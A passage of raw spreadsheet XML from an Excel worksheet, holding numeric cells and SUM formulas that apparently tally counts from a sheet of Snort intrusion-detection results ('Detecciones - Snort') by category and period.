      <c r="C12" s="147" t="s">
        <v>1166</v>
      </c>
      <c r="D12" s="147" t="s">
        <v>1187</v>
      </c>
      <c r="E12" s="46" t="s">
        <v>10</v>
      </c>
      <c r="F12" s="147">
        <v>0.0</v>
      </c>
      <c r="G12" s="46" t="s">
        <v>1188</v>
      </c>
      <c r="H12" s="147">
        <v>5.0</v>
      </c>
      <c r="I12" s="147" t="s">
        <v>1188</v>
      </c>
      <c r="J12" s="147">
        <v>5.0</v>
      </c>
      <c r="K12" s="147" t="s">
        <v>1189</v>
      </c>
      <c r="L12" s="147">
        <v>24.0</v>
      </c>
      <c r="M12" s="149" t="s">
        <v>59</v>
      </c>
      <c r="N12" s="144"/>
      <c r="O12" s="144"/>
      <c r="P12" s="145"/>
      <c r="Q12" s="145"/>
      <c r="R12" s="145"/>
    </row>
    <row r="13">
      <c r="A13" s="146" t="s">
        <v>1190</v>
      </c>
      <c r="B13" s="147" t="s">
        <v>1155</v>
      </c>
      <c r="C13" s="147" t="s">
        <v>1166</v>
      </c>
      <c r="D13" s="147" t="s">
        <v>1191</v>
      </c>
      <c r="E13" s="46" t="s">
        <v>10</v>
      </c>
      <c r="F13" s="147">
        <v>0.0</v>
      </c>
      <c r="G13" s="46" t="s">
        <v>1184</v>
      </c>
      <c r="H13" s="147">
        <v>4.0</v>
      </c>
      <c r="I13" s="147" t="s">
        <v>1184</v>
      </c>
      <c r="J13" s="147">
        <v>4.0</v>
      </c>
      <c r="K13" s="147" t="s">
        <v>1192</v>
      </c>
      <c r="L13" s="147">
        <v>22.0</v>
      </c>
      <c r="M13" s="149" t="s">
        <v>59</v>
      </c>
      <c r="N13" s="144"/>
      <c r="O13" s="144"/>
      <c r="P13" s="145"/>
      <c r="Q13" s="145"/>
      <c r="R13" s="145"/>
    </row>
    <row r="14">
      <c r="A14" s="150" t="s">
        <v>1193</v>
      </c>
      <c r="B14" s="151" t="s">
        <v>10</v>
      </c>
      <c r="C14" s="151" t="s">
        <v>10</v>
      </c>
      <c r="D14" s="151" t="s">
        <v>10</v>
      </c>
      <c r="E14" s="77" t="s">
        <v>10</v>
      </c>
      <c r="F14" s="152">
        <v>0.0</v>
      </c>
      <c r="G14" s="77" t="s">
        <v>1194</v>
      </c>
      <c r="H14" s="152">
        <v>14.0</v>
      </c>
      <c r="I14" s="153" t="s">
        <v>1195</v>
      </c>
      <c r="J14" s="152">
        <v>15.0</v>
      </c>
      <c r="K14" s="153" t="s">
        <v>1196</v>
      </c>
      <c r="L14" s="152">
        <v>43.0</v>
      </c>
      <c r="M14" s="154" t="s">
        <v>10</v>
      </c>
      <c r="N14" s="137"/>
      <c r="O14" s="137"/>
    </row>
    <row r="15">
      <c r="N15" s="137"/>
      <c r="O15" s="137"/>
    </row>
    <row r="16">
      <c r="A16" s="137"/>
      <c r="B16" s="137"/>
      <c r="C16" s="137"/>
      <c r="D16" s="137"/>
      <c r="E16" s="137"/>
      <c r="F16" s="137"/>
      <c r="G16" s="137"/>
      <c r="H16" s="137"/>
      <c r="I16" s="137"/>
      <c r="J16" s="137"/>
      <c r="K16" s="137"/>
      <c r="L16" s="137"/>
      <c r="M16" s="137"/>
      <c r="N16" s="137"/>
      <c r="O16" s="137"/>
    </row>
    <row r="17">
      <c r="A17" s="137"/>
      <c r="B17" s="137"/>
      <c r="C17" s="137"/>
      <c r="D17" s="137"/>
      <c r="E17" s="137"/>
      <c r="F17" s="137"/>
      <c r="G17" s="137"/>
      <c r="H17" s="137"/>
      <c r="I17" s="137"/>
      <c r="J17" s="155"/>
      <c r="K17" s="137"/>
      <c r="L17" s="137"/>
      <c r="M17" s="137"/>
      <c r="N17" s="137"/>
      <c r="O17" s="137"/>
    </row>
    <row r="18">
      <c r="A18" s="137"/>
      <c r="B18" s="137"/>
      <c r="C18" s="137"/>
      <c r="D18" s="137"/>
      <c r="E18" s="137"/>
      <c r="F18" s="137"/>
      <c r="G18" s="137"/>
      <c r="H18" s="137"/>
      <c r="I18" s="137"/>
      <c r="J18" s="137"/>
      <c r="K18" s="137"/>
      <c r="L18" s="137"/>
      <c r="M18" s="137"/>
      <c r="N18" s="137"/>
      <c r="O18" s="137"/>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="E2:F2"/>
    <mergeCell ref="G2:H2"/>
    <mergeCell ref="I2:J2"/>
    <mergeCell ref="K2:L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25"/>
    <col customWidth="1" min="4" max="4" width="13.88"/>
    <col customWidth="1" min="5" max="5" width="14.0"/>
    <col customWidth="1" min="6" max="6" width="20.13"/>
    <col customWidth="1" min="7" max="7" width="14.0"/>
    <col customWidth="1" min="8" max="8" width="17.13"/>
    <col customWidth="1" min="9" max="10" width="28.75"/>
    <col customWidth="1" min="15" max="15" width="18.88"/>
    <col customWidth="1" min="17" max="17" width="27.13"/>
    <col customWidth="1" min="22" max="22" width="18.88"/>
    <col customWidth="1" min="24" max="24" width="29.38"/>
    <col customWidth="1" min="31" max="31" width="21.75"/>
  </cols>
  <sheetData>
    <row r="8">
      <c r="C8" s="156" t="s">
        <v>1197</v>
      </c>
      <c r="D8" s="126"/>
      <c r="E8" s="126"/>
      <c r="F8" s="127"/>
      <c r="G8" s="157"/>
      <c r="H8" s="157"/>
      <c r="I8" s="158"/>
      <c r="J8" s="159" t="s">
        <v>1198</v>
      </c>
      <c r="K8" s="126"/>
      <c r="L8" s="126"/>
      <c r="M8" s="126"/>
      <c r="N8" s="126"/>
      <c r="O8" s="127"/>
      <c r="Q8" s="159" t="s">
        <v>1199</v>
      </c>
      <c r="R8" s="126"/>
      <c r="S8" s="126"/>
      <c r="T8" s="126"/>
      <c r="U8" s="126"/>
      <c r="V8" s="127"/>
      <c r="X8" s="159" t="s">
        <v>1200</v>
      </c>
      <c r="Y8" s="126"/>
      <c r="Z8" s="126"/>
      <c r="AA8" s="126"/>
      <c r="AB8" s="126"/>
      <c r="AC8" s="127"/>
      <c r="AE8" s="159" t="s">
        <v>1201</v>
      </c>
      <c r="AF8" s="126"/>
      <c r="AG8" s="126"/>
      <c r="AH8" s="126"/>
      <c r="AI8" s="127"/>
      <c r="AJ8" s="158"/>
      <c r="AK8" s="158"/>
      <c r="AL8" s="158"/>
      <c r="AM8" s="158"/>
      <c r="AN8" s="158"/>
      <c r="AO8" s="158"/>
      <c r="AP8" s="158"/>
      <c r="AQ8" s="158"/>
      <c r="AR8" s="158"/>
      <c r="AS8" s="158"/>
    </row>
    <row r="9">
      <c r="C9" s="160" t="s">
        <v>1202</v>
      </c>
      <c r="D9" s="161" t="s">
        <v>14</v>
      </c>
      <c r="E9" s="161" t="s">
        <v>12</v>
      </c>
      <c r="F9" s="162" t="s">
        <v>16</v>
      </c>
      <c r="G9" s="163"/>
      <c r="H9" s="163"/>
      <c r="I9" s="163"/>
      <c r="J9" s="160" t="s">
        <v>1203</v>
      </c>
      <c r="K9" s="161" t="s">
        <v>4</v>
      </c>
      <c r="L9" s="161" t="s">
        <v>5</v>
      </c>
      <c r="M9" s="161" t="s">
        <v>6</v>
      </c>
      <c r="N9" s="161" t="s">
        <v>7</v>
      </c>
      <c r="O9" s="162" t="s">
        <v>1204</v>
      </c>
      <c r="Q9" s="160" t="s">
        <v>1203</v>
      </c>
      <c r="R9" s="161" t="s">
        <v>4</v>
      </c>
      <c r="S9" s="161" t="s">
        <v>5</v>
      </c>
      <c r="T9" s="161" t="s">
        <v>6</v>
      </c>
      <c r="U9" s="161" t="s">
        <v>7</v>
      </c>
      <c r="V9" s="162" t="s">
        <v>1205</v>
      </c>
      <c r="X9" s="160" t="s">
        <v>1203</v>
      </c>
      <c r="Y9" s="161" t="s">
        <v>4</v>
      </c>
      <c r="Z9" s="161" t="s">
        <v>5</v>
      </c>
      <c r="AA9" s="161" t="s">
        <v>6</v>
      </c>
      <c r="AB9" s="161" t="s">
        <v>7</v>
      </c>
      <c r="AC9" s="162" t="s">
        <v>1206</v>
      </c>
      <c r="AE9" s="160" t="s">
        <v>1203</v>
      </c>
      <c r="AF9" s="161" t="s">
        <v>4</v>
      </c>
      <c r="AG9" s="161" t="s">
        <v>5</v>
      </c>
      <c r="AH9" s="161" t="s">
        <v>6</v>
      </c>
      <c r="AI9" s="162" t="s">
        <v>7</v>
      </c>
      <c r="AJ9" s="163"/>
      <c r="AK9" s="163"/>
      <c r="AL9" s="163"/>
      <c r="AM9" s="163"/>
      <c r="AN9" s="163"/>
      <c r="AO9" s="163"/>
      <c r="AP9" s="163"/>
      <c r="AQ9" s="163"/>
      <c r="AR9" s="163"/>
      <c r="AS9" s="163"/>
    </row>
    <row r="10" ht="19.5" customHeight="1">
      <c r="C10" s="164">
        <v>4022.0</v>
      </c>
      <c r="D10" s="165">
        <v>35763.0</v>
      </c>
      <c r="E10" s="165">
        <v>41529.0</v>
      </c>
      <c r="F10" s="166">
        <v>12067.0</v>
      </c>
      <c r="G10" s="167"/>
      <c r="H10" s="167"/>
      <c r="I10" s="167"/>
      <c r="J10" s="168" t="s">
        <v>46</v>
      </c>
      <c r="K10" s="169">
        <v>1.0</v>
      </c>
      <c r="L10" s="169">
        <v>2.0</v>
      </c>
      <c r="M10" s="169">
        <v>2.0</v>
      </c>
      <c r="N10" s="169">
        <v>2.0</v>
      </c>
      <c r="O10" s="170">
        <v>4.0</v>
      </c>
      <c r="Q10" s="168" t="s">
        <v>46</v>
      </c>
      <c r="R10" s="169">
        <v>1.0</v>
      </c>
      <c r="S10" s="169">
        <v>3.0</v>
      </c>
      <c r="T10" s="169">
        <v>4.0</v>
      </c>
      <c r="U10" s="169">
        <v>4.0</v>
      </c>
      <c r="V10" s="170">
        <v>6.0</v>
      </c>
      <c r="X10" s="168" t="s">
        <v>46</v>
      </c>
      <c r="Y10" s="169">
        <f>SUM('(B) - Detecciones - Snort'!N4:N9)</f>
        <v>46</v>
      </c>
      <c r="Z10" s="169">
        <f>SUM('(B) - Detecciones - Snort'!R4:R9)</f>
        <v>73</v>
      </c>
      <c r="AA10" s="169">
        <f>SUM('(B) - Detecciones - Snort'!V4:V9)</f>
        <v>87</v>
      </c>
      <c r="AB10" s="169">
        <f>SUM('(B) - Detecciones - Snort'!Z4:Z9)</f>
        <v>119</v>
      </c>
      <c r="AC10" s="170">
        <v>119.0</v>
      </c>
      <c r="AD10" s="169"/>
      <c r="AE10" s="168" t="s">
        <v>46</v>
      </c>
      <c r="AF10" s="171">
        <f t="shared" ref="AF10:AI10" si="1">Y10/$V10</f>
        <v>7.666666667</v>
      </c>
      <c r="AG10" s="171">
        <f t="shared" si="1"/>
        <v>12.16666667</v>
      </c>
      <c r="AH10" s="171">
        <f t="shared" si="1"/>
        <v>14.5</v>
      </c>
      <c r="AI10" s="172">
        <f t="shared" si="1"/>
        <v>19.83333333</v>
      </c>
      <c r="AJ10" s="169"/>
      <c r="AK10" s="169"/>
      <c r="AL10" s="169"/>
      <c r="AM10" s="169"/>
      <c r="AN10" s="169"/>
      <c r="AO10" s="169"/>
      <c r="AP10" s="169"/>
      <c r="AQ10" s="169"/>
      <c r="AR10" s="169"/>
      <c r="AS10" s="169"/>
    </row>
    <row r="11">
      <c r="C11" s="167"/>
      <c r="D11" s="167"/>
      <c r="E11" s="167"/>
      <c r="F11" s="167"/>
      <c r="G11" s="167"/>
      <c r="H11" s="167"/>
      <c r="I11" s="167"/>
      <c r="J11" s="168" t="s">
        <v>119</v>
      </c>
      <c r="K11" s="169">
        <v>0.0</v>
      </c>
      <c r="L11" s="169">
        <v>0.0</v>
      </c>
      <c r="M11" s="169">
        <v>0.0</v>
      </c>
      <c r="N11" s="169">
        <v>0.0</v>
      </c>
      <c r="O11" s="170">
        <v>2.0</v>
      </c>
      <c r="Q11" s="168" t="s">
        <v>119</v>
      </c>
      <c r="R11" s="169">
        <v>0.0</v>
      </c>
      <c r="S11" s="169">
        <v>0.0</v>
      </c>
      <c r="T11" s="169">
        <v>0.0</v>
      </c>
      <c r="U11" s="169">
        <v>0.0</v>
      </c>
      <c r="V11" s="170">
        <v>2.0</v>
      </c>
      <c r="X11" s="168" t="s">
        <v>119</v>
      </c>
      <c r="Y11" s="169">
        <v>44.0</v>
      </c>
      <c r="Z11" s="169">
        <v>59.0</v>
      </c>
      <c r="AA11" s="169">
        <v>65.0</v>
      </c>
      <c r="AB11" s="169">
        <v>80.0</v>
      </c>
      <c r="AC11" s="170">
        <v>80.0</v>
      </c>
      <c r="AD11" s="169"/>
      <c r="AE11" s="168" t="s">
        <v>119</v>
      </c>
      <c r="AF11" s="171">
        <f t="shared" ref="AF11:AI11" si="2">Y11/$V11</f>
        <v>22</v>
      </c>
      <c r="AG11" s="171">
        <f t="shared" si="2"/>
        <v>29.5</v>
      </c>
      <c r="AH11" s="171">
        <f t="shared" si="2"/>
        <v>32.5</v>
      </c>
      <c r="AI11" s="172">
        <f t="shared" si="2"/>
        <v>40</v>
      </c>
      <c r="AJ11" s="169"/>
      <c r="AK11" s="169"/>
      <c r="AL11" s="169"/>
      <c r="AM11" s="169"/>
      <c r="AN11" s="169"/>
      <c r="AO11" s="169"/>
      <c r="AP11" s="169"/>
      <c r="AQ11" s="169"/>
      <c r="AR11" s="169"/>
      <c r="AS11" s="169"/>
    </row>
    <row r="12">
      <c r="C12" s="167"/>
      <c r="D12" s="167"/>
      <c r="E12" s="167"/>
      <c r="F12" s="167"/>
      <c r="G12" s="167"/>
      <c r="H12" s="167"/>
      <c r="I12" s="167"/>
      <c r="J12" s="168" t="s">
        <v>171</v>
      </c>
      <c r="K12" s="169">
        <v>1.0</v>
      </c>
      <c r="L12" s="169">
        <v>1.0</v>
      </c>
      <c r="M12" s="169">
        <v>2.0</v>
      </c>
      <c r="N12" s="169">
        <v>2.0</v>
      </c>
      <c r="O12" s="170">
        <v>7.0</v>
      </c>
      <c r="Q12" s="168" t="s">
        <v>171</v>
      </c>
      <c r="R12" s="169">
        <v>1.0</v>
      </c>
      <c r="S12" s="169">
        <v>1.0</v>
      </c>
      <c r="T12" s="169">
        <v>2.0</v>
      </c>
      <c r="U12" s="169">
        <v>3.0</v>
      </c>
      <c r="V12" s="170">
        <v>12.0</v>
      </c>
      <c r="X12" s="168" t="s">
        <v>171</v>
      </c>
      <c r="Y12" s="169">
        <f>SUM('(B) - Detecciones - Snort'!N15:N26)</f>
        <v>6</v>
      </c>
      <c r="Z12" s="169">
        <f>SUM('(B) - Detecciones - Snort'!R15:R26)</f>
        <v>13</v>
      </c>
      <c r="AA12" s="169">
        <f>SUM('(B) - Detecciones - Snort'!V15:V26)</f>
        <v>21</v>
      </c>
      <c r="AB12" s="169">
        <f>SUM('(B) - Detecciones - Snort'!Z15:Z26)</f>
        <v>59</v>
      </c>
      <c r="AC12" s="170">
        <v>59.0</v>
      </c>
      <c r="AD12" s="169"/>
      <c r="AE12" s="168" t="s">
        <v>171</v>
      </c>
      <c r="AF12" s="171">
        <f t="shared" ref="AF12:AI12" si="3">Y12/$V12</f>
        <v>0.5</v>
      </c>
      <c r="AG12" s="171">
        <f t="shared" si="3"/>
        <v>1.083333333</v>
      </c>
      <c r="AH12" s="171">
        <f t="shared" si="3"/>
        <v>1.75</v>
      </c>
      <c r="AI12" s="172">
        <f t="shared" si="3"/>
        <v>4.916666667</v>
      </c>
      <c r="AJ12" s="169"/>
      <c r="AK12" s="169"/>
      <c r="AL12" s="169"/>
      <c r="AM12" s="169"/>
      <c r="AN12" s="169"/>
      <c r="AO12" s="169"/>
      <c r="AP12" s="169"/>
      <c r="AQ12" s="169"/>
      <c r="AR12" s="169"/>
      <c r="AS12" s="169"/>
    </row>
    <row r="13">
      <c r="C13" s="167"/>
      <c r="D13" s="167"/>
      <c r="E13" s="167"/>
      <c r="F13" s="167"/>
      <c r="G13" s="167"/>
      <c r="H13" s="167"/>
      <c r="I13" s="167"/>
      <c r="J13" s="168" t="s">
        <v>172</v>
      </c>
      <c r="K13" s="169">
        <v>0.0</v>
      </c>
      <c r="L13" s="169">
        <v>1.0</v>
      </c>
      <c r="M13" s="169">
        <v>1.0</v>
      </c>
      <c r="N13" s="169">
        <v>1.0</v>
      </c>
      <c r="O13" s="170">
        <v>6.0</v>
      </c>
      <c r="Q13" s="168" t="s">
        <v>172</v>
      </c>
      <c r="R13" s="169">
        <v>0.0</v>
      </c>
      <c r="S13" s="169">
        <v>1.0</v>
      </c>
      <c r="T13" s="169">
        <v>3.0</v>
      </c>
      <c r="U13" s="169">
        <v>3.0</v>
      </c>
      <c r="V13" s="170">
        <v>7.0</v>
      </c>
      <c r="X13" s="168" t="s">
        <v>172</v>
      </c>
      <c r="Y13" s="169">
        <f>SUM('(B) - Detecciones - Snort'!N27:N31)+SUM('(B) - Detecciones - Snort'!N15)+SUM('(B) - Detecciones - Snort'!N95)</f>
        <v>1</v>
      </c>
      <c r="Z13" s="169">
        <f>SUM('(B) - Detecciones - Snort'!R27:R31)+SUM('(B) - Detecciones - Snort'!R15)+SUM('(B) - Detecciones - Snort'!R95)</f>
        <v>6</v>
      </c>
      <c r="AA13" s="169">
        <f>SUM('(B) - Detecciones - Snort'!V27:V31)+SUM('(B) - Detecciones - Snort'!V15)+SUM('(B) - Detecciones - Snort'!V95)</f>
        <v>14</v>
      </c>
      <c r="AB13" s="169">
        <f>SUM('(B) - Detecciones - Snort'!Z27:Z31)+SUM('(B) - Detecciones - Snort'!Z15)+SUM('(B) - Detecciones - Snort'!Z95)</f>
        <v>37</v>
      </c>
      <c r="AC13" s="170">
        <v>37.0</v>
      </c>
      <c r="AD13" s="169"/>
      <c r="AE13" s="168" t="s">
        <v>172</v>
      </c>
      <c r="AF13" s="171">
        <f t="shared" ref="AF13:AI13" si="4">Y13/$V13</f>
        <v>0.1428571429</v>
      </c>
      <c r="AG13" s="171">
        <f t="shared" si="4"/>
        <v>0.8571428571</v>
      </c>
      <c r="AH13" s="171">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="AI13" s="172">
        <f t="shared" si="4"/>
        <v>5.285714286</v>
      </c>
      <c r="AJ13" s="169"/>
      <c r="AK13" s="169"/>
      <c r="AL13" s="169"/>
      <c r="AM13" s="169"/>
      <c r="AN13" s="169"/>
      <c r="AO13" s="169"/>
      <c r="AP13" s="169"/>
      <c r="AQ13" s="169"/>
      <c r="AR13" s="169"/>
      <c r="AS13" s="169"/>
    </row>
    <row r="14">
      <c r="C14" s="167"/>
      <c r="D14" s="167"/>
      <c r="E14" s="167"/>
      <c r="F14" s="167"/>
      <c r="G14" s="167"/>
      <c r="H14" s="167"/>
      <c r="I14" s="167"/>
      <c r="J14" s="168" t="s">
        <v>330</v>
      </c>
      <c r="K14" s="169">
        <v>0.0</v>
      </c>
      <c r="L14" s="169">
        <v>0.0</v>
      </c>
      <c r="M14" s="169">
        <v>1.0</v>
      </c>
      <c r="N14" s="169">
        <v>2.0</v>
      </c>
      <c r="O14" s="170">
        <v>3.0</v>
      </c>
      <c r="Q14" s="168" t="s">
        <v>330</v>
      </c>
      <c r="R14" s="169">
        <v>0.0</v>
      </c>
      <c r="S14" s="169">
        <v>0.0</v>
      </c>
      <c r="T14" s="169">
        <v>1.0</v>
      </c>
      <c r="U14" s="169">
        <v>2.0</v>
      </c>
      <c r="V14" s="170">
        <v>10.0</v>
      </c>
      <c r="X14" s="168" t="s">
        <v>330</v>
      </c>
      <c r="Y14" s="169">
        <v>0.0</v>
      </c>
      <c r="Z14" s="169">
        <v>5.0</v>
      </c>
      <c r="AA14" s="169">
        <v>9.0</v>
      </c>
      <c r="AB14" s="169">
        <v>43.0</v>
      </c>
      <c r="AC14" s="170">
        <v>43.0</v>
      </c>
      <c r="AD14" s="169"/>
      <c r="AE14" s="168" t="s">
        <v>330</v>
      </c>
      <c r="AF14" s="171">
        <f t="shared" ref="AF14:AI14" si="5">Y14/$V14</f>
        <v>0</v>
      </c>
      <c r="AG14" s="171">
        <f t="shared" si="5"/>
        <v>0.5</v>
      </c>
      <c r="AH14" s="171">
        <f t="shared" si="5"/>
        <v>0.9</v>
      </c>
      <c r="AI14" s="172">
        <f t="shared" si="5"/>
        <v>4.3</v>
      </c>
      <c r="AJ14" s="169"/>
      <c r="AK14" s="169"/>
      <c r="AL14" s="169"/>
      <c r="AM14" s="169"/>
      <c r="AN14" s="169"/>
      <c r="AO14" s="169"/>
      <c r="AP14" s="169"/>
      <c r="AQ14" s="169"/>
      <c r="AR14" s="169"/>
      <c r="AS14" s="169"/>
    </row>
    <row r="15">
      <c r="C15" s="167"/>
      <c r="D15" s="167"/>
      <c r="E15" s="167"/>
      <c r="F15" s="167"/>
      <c r="G15" s="167"/>
      <c r="H15" s="167"/>
      <c r="I15" s="167"/>
      <c r="J15" s="168" t="s">
        <v>397</v>
      </c>
      <c r="K15" s="169">
        <v>1.0</v>
      </c>
      <c r="L15" s="169">
        <v>1.0</v>
      </c>
      <c r="M15" s="169">
        <v>2.0</v>
      </c>
      <c r="N15" s="169">
        <v>3.0</v>
      </c>
      <c r="O15" s="170">
        <v>5.0</v>
      </c>
      <c r="Q15" s="168" t="s">
        <v>397</v>
      </c>
      <c r="R15" s="169">
        <v>1.0</v>
      </c>
      <c r="S15" s="169">
        <v>1.0</v>
      </c>
      <c r="T15" s="169">
        <v>2.0</v>
      </c>
      <c r="U15" s="169">
        <v>3.0</v>
      </c>
      <c r="V15" s="170">
        <v>11.0</v>
      </c>
      <c r="X15" s="168" t="s">
        <v>397</v>
      </c>
      <c r="Y15" s="169">
        <f>SUM('(B) - Detecciones - Snort'!N52:N55)+SUM('(B) - Detecciones - Snort'!N43:N49)</f>
        <v>2</v>
      </c>
      <c r="Z15" s="169">
        <f>SUM('(B) - Detecciones - Snort'!R52:R55)+SUM('(B) - Detecciones - Snort'!R43:R49)</f>
        <v>7</v>
      </c>
      <c r="AA15" s="169">
        <f>SUM('(B) - Detecciones - Snort'!V52:V55)+SUM('(B) - Detecciones - Snort'!V43:V49)</f>
        <v>9</v>
      </c>
      <c r="AB15" s="169">
        <f>SUM('(B) - Detecciones - Snort'!Z52:Z55)+SUM('(B) - Detecciones - Snort'!Z43:Z49)</f>
        <v>48</v>
      </c>
      <c r="AC15" s="170">
        <v>48.0</v>
      </c>
      <c r="AD15" s="169"/>
      <c r="AE15" s="168" t="s">
        <v>397</v>
      </c>
      <c r="AF15" s="171">
        <f t="shared" ref="AF15:AI15" si="6">Y15/$V15</f>
        <v>0.1818181818</v>
      </c>
      <c r="AG15" s="171">
        <f t="shared" si="6"/>
        <v>0.6363636364</v>
      </c>
      <c r="AH15" s="171">
        <f t="shared" si="6"/>
        <v>0.8181818182</v>
      </c>
      <c r="AI15" s="172">
        <f t="shared" si="6"/>
        <v>4.363636364</v>
      </c>
      <c r="AJ15" s="169"/>
      <c r="AK15" s="169"/>
      <c r="AL15" s="169"/>
      <c r="AM15" s="169"/>
      <c r="AN15" s="169"/>
      <c r="AO15" s="169"/>
      <c r="AP15" s="169"/>
      <c r="AQ15" s="169"/>
      <c r="AR15" s="169"/>
      <c r="AS15" s="169"/>
    </row>
    <row r="16">
      <c r="C16" s="167"/>
      <c r="D16" s="167"/>
      <c r="E16" s="167"/>
      <c r="F16" s="167"/>
      <c r="G16" s="167"/>
      <c r="H16" s="167"/>
      <c r="I16" s="167"/>
      <c r="J16" s="168" t="s">
        <v>509</v>
      </c>
      <c r="K16" s="169">
        <v>0.0</v>
      </c>
      <c r="L16" s="169">
        <v>2.0</v>
      </c>
      <c r="M16" s="169">
        <v>2.0</v>
      </c>
      <c r="N16" s="169">
        <v>3.0</v>
      </c>
      <c r="O16" s="170">
        <v>5.0</v>
      </c>
      <c r="Q16" s="168" t="s">
        <v>509</v>
      </c>
      <c r="R16" s="169">
        <v>0.0</v>
      </c>
      <c r="S16" s="169">
        <v>2.0</v>
      </c>
      <c r="T16" s="169">
        <v>3.0</v>
      </c>
      <c r="U16" s="169">
        <v>4.0</v>
      </c>
      <c r="V16" s="170">
        <v>23.0</v>
      </c>
      <c r="X16" s="168" t="s">
        <v>509</v>
      </c>
      <c r="Y16" s="169">
        <f>SUM('(B) - Detecciones - Snort'!N56:N79)</f>
        <v>6</v>
      </c>
      <c r="Z16" s="169">
        <f>SUM('(B) - Detecciones - Snort'!R56:R79)</f>
        <v>12</v>
      </c>
      <c r="AA16" s="169">
        <f>SUM('(B) - Detecciones - Snort'!V56:V79)</f>
        <v>15</v>
      </c>
      <c r="AB16" s="169">
        <f>SUM('(B) - Detecciones - Snort'!Z56:Z79)</f>
        <v>83</v>
      </c>
      <c r="AC16" s="170">
        <v>83.0</v>
      </c>
      <c r="AD16" s="169"/>
      <c r="AE16" s="168" t="s">
        <v>509</v>
      </c>
      <c r="AF16" s="171">
        <f t="shared" ref="AF16:AI16" si="7">Y16/$V16</f>
        <v>0.2608695652</v>
      </c>
      <c r="AG16" s="171">
        <f t="shared" si="7"/>
        <v>0.5217391304</v>
      </c>
      <c r="AH16" s="171">
        <f t="shared" si="7"/>
        <v>0.652173913</v>
      </c>
      <c r="AI16" s="172">
        <f t="shared" si="7"/>
        <v>3.608695652</v>
      </c>
      <c r="AJ16" s="169"/>
      <c r="AK16" s="169"/>
      <c r="AL16" s="169"/>
      <c r="AM16" s="169"/>
      <c r="AN16" s="169"/>
      <c r="AO16" s="169"/>
      <c r="AP16" s="169"/>
      <c r="AQ16" s="169"/>
      <c r="AR16" s="169"/>
      <c r="AS16" s="169"/>
    </row>
    <row r="17">
      <c r="C17" s="167"/>
      <c r="D17" s="167"/>
      <c r="E17" s="167"/>
      <c r="F17" s="167"/>
      <c r="G17" s="167"/>
      <c r="H17" s="167"/>
      <c r="I17" s="167"/>
      <c r="J17" s="168" t="s">
        <v>244</v>
      </c>
      <c r="K17" s="169">
        <v>0.0</v>
      </c>
      <c r="L17" s="169">
        <v>1.0</v>
      </c>
      <c r="M17" s="169">
        <v>2.0</v>
      </c>
      <c r="N17" s="169">
        <v>3.0</v>
      </c>
      <c r="O17" s="170">
        <v>16.0</v>
      </c>
      <c r="Q17" s="168" t="s">
        <v>244</v>
      </c>
      <c r="R17" s="169">
        <v>0.0</v>
      </c>
      <c r="S17" s="169">
        <v>1.0</v>
      </c>
      <c r="T17" s="169">
        <v>2.0</v>
      </c>
      <c r="U17" s="169">
        <v>3.0</v>
      </c>
      <c r="V17" s="170">
        <v>18.0</v>
      </c>
      <c r="X17" s="168" t="s">
        <v>244</v>
      </c>
      <c r="Y17" s="169">
        <f>SUM('(B) - Detecciones - Snort'!N80:N95)+SUM('(B) - Detecciones - Snort'!N24:N25)</f>
        <v>4</v>
      </c>
      <c r="Z17" s="169">
        <f>SUM('(B) - Detecciones - Snort'!R80:R95)+SUM('(B) - Detecciones - Snort'!R24:R25)</f>
        <v>15</v>
      </c>
      <c r="AA17" s="169">
        <f>SUM('(B) - Detecciones - Snort'!V80:V95)+SUM('(B) - Detecciones - Snort'!V24:V25)</f>
        <v>18</v>
      </c>
      <c r="AB17" s="169">
        <f>SUM('(B) - Detecciones - Snort'!Z80:Z95)+SUM('(B) - Detecciones - Snort'!Z24:Z25)</f>
        <v>66</v>
      </c>
      <c r="AC17" s="170">
        <v>66.0</v>
      </c>
      <c r="AD17" s="169"/>
      <c r="AE17" s="168" t="s">
        <v>244</v>
      </c>
      <c r="AF17" s="171">
        <f t="shared" ref="AF17:AI17" si="8">Y17/$V17</f>
        <v>0.2222222222</v>
      </c>
      <c r="AG17" s="171">
        <f t="shared" si="8"/>
        <v>0.8333333333</v>
      </c>
      <c r="AH17" s="171">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="AI17" s="172">
        <f t="shared" si="8"/>
        <v>3.666666667</v>
      </c>
      <c r="AJ17" s="169"/>
      <c r="AK17" s="169"/>
      <c r="AL17" s="169"/>
      <c r="AM17" s="169"/>
      <c r="AN17" s="169"/>
      <c r="AO17" s="169"/>
      <c r="AP17" s="169"/>
      <c r="AQ17" s="169"/>
      <c r="AR17" s="169"/>
      <c r="AS17" s="169"/>
    </row>
    <row r="18">
      <c r="C18" s="167"/>
      <c r="D18" s="167"/>
      <c r="E18" s="167"/>
      <c r="F18" s="167"/>
      <c r="G18" s="167"/>
      <c r="H18" s="167"/>
      <c r="I18" s="167"/>
      <c r="J18" s="168" t="s">
        <v>284</v>
      </c>
      <c r="K18" s="169">
        <v>0.0</v>
      </c>
      <c r="L18" s="169">
        <v>0.0</v>
      </c>
      <c r="M18" s="169">
        <v>1.0</v>
      </c>
      <c r="N18" s="169">
        <v>1.0</v>
      </c>
      <c r="O18" s="170">
        <v>10.0</v>
      </c>
      <c r="Q18" s="168" t="s">
        <v>284</v>
      </c>
      <c r="R18" s="169">
        <v>0.0</v>
      </c>
      <c r="S18" s="169">
        <v>0.0</v>
      </c>
      <c r="T18" s="169">
        <v>1.0</v>
      </c>
      <c r="U18" s="169">
        <v>1.0</v>
      </c>
      <c r="V18" s="170">
        <v>11.0</v>
      </c>
      <c r="X18" s="168" t="s">
        <v>284</v>
      </c>
      <c r="Y18" s="169">
        <f>SUM('(B) - Detecciones - Snort'!N96:N103)+SUM('(B) - Detecciones - Snort'!N28:N29)+SUM('(B) - Detecciones - Snort'!N95)</f>
        <v>2</v>
      </c>
      <c r="Z18" s="169">
        <f>SUM('(B) - Detecciones - Snort'!R96:R103)+SUM('(B) - Detecciones - Snort'!R28:R29)+SUM('(B) - Detecciones - Snort'!R95)</f>
        <v>5</v>
      </c>
      <c r="AA18" s="169">
        <f>SUM('(B) - Detecciones - Snort'!V96:V103)+SUM('(B) - Detecciones - Snort'!V28:V29)+SUM('(B) - Detecciones - Snort'!V95)</f>
        <v>8</v>
      </c>
      <c r="AB18" s="169">
        <f>SUM('(B) - Detecciones - Snort'!Z96:Z103)+SUM('(B) - Detecciones - Snort'!Z28:Z29)+SUM('(B) - Detecciones - Snort'!Z95)</f>
